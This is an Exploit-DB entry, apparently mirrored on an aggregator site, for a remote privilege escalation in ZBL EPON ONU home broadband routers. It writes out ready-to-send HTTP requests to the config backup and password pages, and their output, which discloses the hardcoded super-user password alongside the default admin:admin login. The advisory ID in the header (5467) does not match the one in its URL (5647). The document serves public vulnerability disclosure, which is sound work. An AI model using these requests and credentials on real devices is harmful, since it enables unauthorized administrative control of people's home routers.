ZBL EPON ONU Broadband Router 1.0 – Remote Privilege Escalation

• Exploit Database
• 37 阅读

• 作者： LiquidWorm
  日期： 2021-04-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49737/

• # Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
  # Date: 31.01.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
  
  Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
  Product web page: http://www.zblchina.com | http://www.wd-thailand.com
  Affected version: Firmwre: V100R001
  Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
  EONU Hardware Version	V3.0
  Software: V2.46.02P6T5S
  Main Chip: RTL9607
  Master Controller, Copyright (c) R&D
  
  Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
  router.
  
  Desc: The application suffers from a privilege escalation
  vulnerability. The limited administrative user (admin:admin)
  can elevate his/her privileges by sending a HTTP GET request
  to the configuration backup endpoint or the password page
  and disclose the http super user password. Once authenticated
  as super, an attacker will be granted access to additional and
  privileged functionalities.
  
  Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5467
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
  
  
  31.01.2021
  
  --
  
  
  Get config file and disclose super pwd:
  ---------------------------------------
  
  POST /HG104B-ZG-E.config HTTP/1.1
  Host: 192.168.1.1
  Connection: keep-alive
  Content-Length: 42
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: https://192.168.1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: https://192.168.1.1/system_configure.asp
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
  
  CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
  
  
  ...
  #web_1
  user_web_name=super
  user_web_password=www168nettv
  ...
  
  
  Disclose super pwd from system pwd page:
  ----------------------------------------
  
  GET /system_password.asp
  Host: 192.168.1.1
  
  ...
  var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
  var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
  ...